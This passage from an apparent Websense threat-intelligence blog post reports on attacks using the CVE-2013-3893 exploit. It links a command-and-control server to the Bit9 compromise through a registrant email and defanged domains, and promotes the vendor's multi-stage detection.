        2. Websense has three real-time analytics (one has been in place for nearly three years) that blocked the CVE-2013-3893 exploit from compromising customers.

        3. ThreatSeeker Intelligence Cloud reports a potential victim organization in Taiwan attempting to communicate with the malicious C&C server ( associated with the CVE-2013-3893 exploit as early as July 1st, 2013.

        4. The C&C server above can be associated with the Bit9 compromise. The contact email address 654@123.com was used to register the domain blankchair(dot)com which points to the malicious C&C server ( The same email address was used to register a C&C server downloadmp3server(dot)servemp3(dot)com ( associated with the Bit9 attacks.  

        5. Websense Threat Intelligence indicates that the threat actor’s attacks were not limited only to Japan as previously reported. The use of separate IP addresses, domain registrations, and permutations to dropper locations indicates a high degree of segmentation between attacks and different teams using the same tool sets, exploits and C&C infrastructure.


        The real-time analytics deployed in ACE (our Advanced Classification Engine) were able to detect and stop the attack above at three stages independent of the zero-day exploit (CVE-2013-3893) for which we had built specific protection. These analytics were able to detect the techniques used to deliver and obfuscate the exploit and malware, protecting our customer from being compromised. This is a great example of how offering protection from multiple stages of an attack can stop even highly targeted, low volume threats with cutting edge exploits.